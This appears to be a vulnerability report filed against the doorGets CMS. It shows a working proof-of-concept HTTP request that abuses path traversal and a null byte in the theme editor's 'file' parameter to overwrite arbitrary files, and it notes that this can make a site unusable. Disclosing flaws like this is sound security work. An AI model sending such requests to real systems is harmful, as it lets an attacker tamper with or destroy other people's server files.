Modify the contents of the file at will #12
Description
Create a file under the c drive,Content is test
poc:
Modify the contents of the file in 1.txt by poc
`POST /doorGets/dg-user/?controller=theme&action=edit&name=doorgets&file=../../../../../../../../../../../../../1.txt%00 HTTP/1.1
Host: 192.168.235.239
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:63.0) Gecko/20100101 Firefox/63.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.235.239/doorGets/dg-user/?controller=theme&action=edit&name=doorgets&file=doorgets/css/1.txt
Content-Type: multipart/form-data; boundary=---------------------------213043527767318740686762945
Content-Length: 456
Connection: close
Cookie: PHPSESSID=hnqke81g3nt2l9jjb9v2mn9va4
Upgrade-Insecure-Requests: 1
-----------------------------213043527767318740686762945
Content-Disposition: form-data; name="theme_content_nofi"
this is payload
-----------------------------213043527767318740686762945
Content-Disposition: form-data; name="edit_theme_bootstrap_version"
paper
-----------------------------213043527767318740686762945
Content-Disposition: form-data; name="edit_theme_submit"
Save
-----------------------------213043527767318740686762945--
`
Of course, you can also modify the contents of any file to make the web unusable.